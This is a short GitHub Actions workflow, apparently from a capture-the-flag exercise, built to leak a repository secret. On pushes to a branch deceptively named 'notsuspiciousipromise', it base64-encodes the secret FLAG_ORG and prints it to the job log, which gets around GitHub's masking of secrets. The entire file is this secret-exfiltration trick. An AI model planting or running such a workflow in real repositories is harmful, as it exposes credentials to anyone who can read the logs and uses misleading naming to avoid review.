name: showsecret

on:
  push:
    branches:
      - notsuspiciousipromise
jobs:
  showsecret:
    runs-on: ubuntu-latest
    steps:
      - name: Shows GitHub secret
        run:  echo -e ${{secrets.FLAG_ORG}} | base64

